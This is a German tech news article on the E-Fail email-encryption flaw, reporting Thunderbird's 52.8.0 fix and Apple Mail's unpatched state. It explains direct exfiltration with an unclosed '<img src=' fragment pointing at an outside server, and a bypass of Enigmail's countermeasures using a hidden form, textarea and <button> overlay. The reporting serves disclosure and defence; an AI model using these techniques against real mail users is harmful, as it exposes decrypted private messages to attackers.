Abo
  • IT-Karriere:

PGP/SMIME: Thunderbird-Update notwendig, um E-Fail zu verhindern

Thunderbird war bis Freitag für die E-Fail-Sicherheitslücke verwundbar, für Apple Mail gibt es bislang überhaupt kein Update. Vorläufig ist es empfehlenswert, HTML-Mails komplett zu deaktivieren.

Eine Exklusivmeldung von Hanno Böck veröffentlicht am
Efail konnte man auch nach einem Update von Enigmail noch ausnutzen.
Efail konnte man auch nach einem Update von Enigmail noch ausnutzen. (Bild: efail/CC0 1.0)

Nutzer des Thunderbird-Mailprogramms, die Mailverschlüsselung benutzen, sollten dringend das Update auf Version 52.8.0 installieren. Neben weiteren Sicherheitslücken werden darin verschiedene Bugs behoben, die es Angreifern ermöglichen, verschlüsselte Nachrichten zu exfiltrieren. Nach wie vor kein Update gibt es für Apple Mail, das ähnlich wie Thunderbird von der gravierendsten Variante der E-Fail-Sicherheitslücke betroffen ist.

Stellenmarkt
  1. DKV MOBILITY SERVICES Business Center, Ratingen
  2. BG-Phoenics GmbH, München

Am Montag hatten Sicherheitsforscher zahlreiche Sicherheitsprobleme bei verschlüsselten Mails publiziert. Ein Entwickler von Enigmail hatte zwischenzeitlich behauptet, dass es überhaupt keinen Grund zur Sorge gäbe: Wer die aktuelle Version installiert habe, sei sicher. Doch das stimmte nicht. Zwar hatte Enigmail Gegenmaßnahmen implementiert, die waren jedoch relativ leicht zu umgehen.

Direct Exfiltration nutzt mehrere Mailparts

Die gravierendste Variante der E-Fail-Lücke ist die sogenannte Direct Exfiltration. Dabei nutzt ein Angreifer die Tatsache aus, dass HTML-Mails mit mehreren Teilen im Mailprogramm gemeinsam gerendert werden. In der simpelsten Variante kann ein Angreifer somit etwa ein Bild von seinem eigenen Server laden und dabei den HTML-Tag nicht schließen (etwa <img src="https://efail.de/x=). Anschließend fügt er den verschlüsselten Mailinhalt ein. Dieser wird dann direkt als Parameter angehängt.

Diese Variante funktioniert aber nur, wenn das Nachladen von Inhalten bei HTML-Mails aktiviert ist. Bei Thunderbird ist es das in der Standardeinstellung nicht. Weiterhin hatten die Entwickler von Enigmail zwischen den Mailparts Anführungszeichen eingefügt. Damit wurde das Anhängen als Parameter unterbrochen.

Mit Formularen lassen sich Gegenmaßnahmen von Enigmail austricksen

Gemeinsam mit Jens Müller, einem der Co-Autoren des E-Fail-Papers, gelang es dem Autor dieses Artikels jedoch, trotz dieser beiden Hürden Mailinhalte zu exfiltrieren. Statt dem Nachladen eines Bildes kann man auch ein Formular verwenden. In dieses Formular fügt man eine Textarea ein. Der Vorteil: Bei einem <textarea>-Tag wird der Inhalt nicht von Anführungszeichen eingeschlossen, sondern von HTML-Tags.

Thunderbird versuchte bereits bisher, das Abschicken eines Formulars in einer HTML-Mail zu verhindern. Bei einem Klick auf einen normalen HTML-Submit-Button (<input type="submit">) wird zwar die Ziel-URL geladen, es werden jedoch keine Daten übertragen. Doch diese Schutzmaßnahme von Thunderbird war unvollständig: Neben dem <input>-Tag kann man einen Formularbutton auch mit dem <button>-Element einfügen. Und da griff die Schutzmaßnahme bislang nicht.

Somit kann ein Angreifer Folgendes machen: Er erzeugt eine Mail, die ein Formular enthält. Im Formular gibt es ein Textarea-Feld, das den verschlüsselten Teil, der exfiltriert werden soll, einschließt. Weiterhin fügt der Angreifer mit dem <button>-Element einen Button ein.

Um das Ganze möglichst unauffällig zu machen, kann man das Textarea-Feld und den Button mittels CSS unsichtbar machen. Weiterhin kann man den Button über die gesamte Mail legen. Das hat zur Folge, dass ein beliebiger Mausklick irgendwo in der dargestellten Mail dazu führt, dass die Daten an den Angreifer geschickt werden.

In der jetzt veröffentlichten Thunderbird-Version ist das Abschicken von Formularen mittels des <button>-Tags nicht mehr möglich. Damit wird der Angriff in dieser Form verhindert.

Weitere Lücken denkbar

Nach wie vor stellt Thunderbird mehrere Mailteile in einem HTML-Kontext dar. Das soll erst in einer kommenden Version behoben werden. Daher ist es gut möglich, dass weitere Tricks gefunden werden, mit denen man Mailinhalte exfiltrieren kann. Es empfielt sich daher, die Darstellung von HTML-Mails generell abzuschalten.

Apple Mail ist laut Aussage der E-Fail-Entdecker weiterhin vollständig für die Direct-Exfiltration-Lücke verwundbar. Wir haben Apple um eine Stellungnahme gebeten, bisher aber keine Antwort erhalten.

Nach der Veröffentlichung von E-Fail kam es zu heftigen Diskussionen über die Art der Veröffentlichung und insbesondere über die Warnungen der Electronic Frontier Foundation. Ein entscheidender Aspekt wurde dabei bislang wenig beachtet: Trotz monatelanger Vorwarnzeit waren wichtige Softwareprojekte nicht in der Lage, rechtzeitig Sicherheitsupdates bereitzustellen.



Anzeige
Top-Angebote
  1. (Monitore ab 147,99€ und Laptops ab 279,00€)
  2. 99,99€(Bestpreis!)
  3. GRATIS
  4. (u. a. Twilight Struggle, Carcassonne, Mysterium, Scythe)

navtis 22. Mai 2018

Ist es, wenn man feststellt, dass die mail nicht signiert war, nicht längst zu spät?

Sharra 22. Mai 2018

Auch in "deiner Welt" kann man updates automatisieren... Was hier und da auch durchaus...

throgh 20. Mai 2018

Und? Wie lange hat es jetzt gedauert bis erste Korrekturen vorgelegen haben? Ja, Open...


Folgen Sie uns
       


Demo gegen Uploadfilter in Berlin - Bericht

Impressionen von der Demonstration am 23. März 2019 gegen die Uploadfilter in Berlin.

Demo gegen Uploadfilter in Berlin - Bericht Video aufrufen
P30 Pro im Kameratest: Huawei baut die vielseitigste Smartphone-Kamera
P30 Pro im Kameratest
Huawei baut die vielseitigste Smartphone-Kamera

Huawei will mit dem P30 Pro seinen Vorsprung vor den Smartphone-Kameras der Konkurrenez ausbauen - und schafft es mit einigen grundlegenden Veränderungen.
Ein Test von Tobias Költzsch

  1. CIA-Vorwürfe Huawei soll von chinesischer Regierung finanziert werden
  2. Huawei-Gründer "Warte auf Medikament von Google gegen Sterblichkeit"
  3. 5G-Ausbau Sicherheitskriterien führen nicht zu Ausschluss von Huawei

Swobbee: Der Wechselakku kommt wieder
Swobbee
Der Wechselakku kommt wieder

Mieten statt kaufen, wechseln statt laden: Das Berliner Startup Swobbee baut eine Infrastruktur mit Lade- und Tauschstationen für Akkus auf. Ein ähnliches Geschäftsmodell ist schon einmal gescheitert. Dieses kann jedoch aufgehen.
Eine Analyse von Werner Pluta

  1. Elektromobilität Seoul will Zweirad-Kraftfahrzeuge und Minibusse austauschen
  2. Rechtsanspruch auf Wallboxen Wohnungswirtschaft warnt vor "Schnellschuss" bei WEG-Reform
  3. Innolith Energy Battery Schweizer Unternehmen entwickelt sehr leistungsfähigen Akku

Anno 1800 im Test: Super aufgebaut
Anno 1800 im Test
Super aufgebaut

Ach, ist das schön: In Anno 1800 sind wir endlich wieder in einer heimelig-historischen Welt unterwegs - zumindest anfangs. Das neue Werk von Blue Byte fesselt dank des toll umgesetzten und unverwüstlichen Spielprinzips. Auch neue Elemente wie die Klassengesellschaft funktionieren.
Von Peter Steinlechner

  1. Ubisoft Blue Byte Anno 1800 erhält Koop-Modus und mehr Statistiken
  2. Ubisoft Blue Byte Preload der offenen Beta von Anno 1800 eröffnet
  3. Systemanforderungen Anno 1800 braucht schnelle CPU

    •  /